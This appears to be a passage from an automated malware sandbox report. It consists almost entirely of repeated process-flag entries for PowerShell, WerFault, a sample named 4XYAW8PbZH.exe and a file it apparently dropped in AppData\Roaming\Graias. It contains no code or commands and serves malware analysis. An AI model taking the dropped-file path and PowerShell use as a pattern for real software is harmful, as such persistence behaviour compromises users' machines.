                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
